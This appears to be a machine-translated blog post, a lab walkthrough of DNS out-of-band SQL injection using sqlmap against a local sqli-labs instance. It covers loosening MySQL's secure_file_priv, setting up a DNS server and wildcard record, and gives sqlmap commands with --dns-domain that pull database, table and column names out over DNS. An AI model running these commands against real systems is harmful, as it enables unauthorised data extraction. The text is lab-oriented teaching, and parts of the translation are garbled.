当前位置:网站首页>Reproduce dns out-band data combined with sqlmap
Reproduce dns out-band data combined with sqlmap
2022-08-10 06:33:00 【fish pass ruler zz】
Set mysql's secure_file_priv attribute
If secure_file_priv is empty, you can read the directory of the disk
If secure_file_priv is D:\, you can read the files in the D disk
If secure_file_priv is null, load_file cannot load files
Add a sentence secure_file_priv=“”

Configure dns server
1.Add role
2.Add positiveFind 
3. New host
IP addressFor the ip address of the virtual machine where sqlmap is located
Create aPan analysis
Use virtual machine ping just set on the server, and enter tcpdump -n port 53 in kali; check the information returned.

4. Create conditional repeater
SQLMap uses out-of-band dns injection
Fetch library
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables
Get table
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables
Get Columns
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns
边栏推荐
猜你喜欢
随机推荐
Unity扩展编辑器EditorWindow 小玩意(一)
网页安全证书错误但无法安装证书的解决办法
OSPF的dr和bdr
Unity2d自动寻路(AI插件)
Unity扩展编辑器EditorWindow 小玩意(二)
UnityShader入门精要-高级光照基础
Why need to hot update game?
Kernel Image File Format
个人实现的可任意折叠QToolBox——AdvancedToolBox
裸辞—躺平—刷题—大厂(Android面试的几大技巧)
webSocket教程
关于MongoDb查询Decimal128转BigDecimal问题
强化学习_05_DataWhale近端策略优化
OpenGL学习笔记(LearnOpenGL)-第四部分 着色器
一种奇怪的函数声明写法
DRM Memory Management
Two-dimensional cartoon rendering of strokes
手机与雷电模拟器里如何使用YiLu代理?
vscode + ccls环境配置
强化学习_07_DataWhale深度Q网络进阶技巧








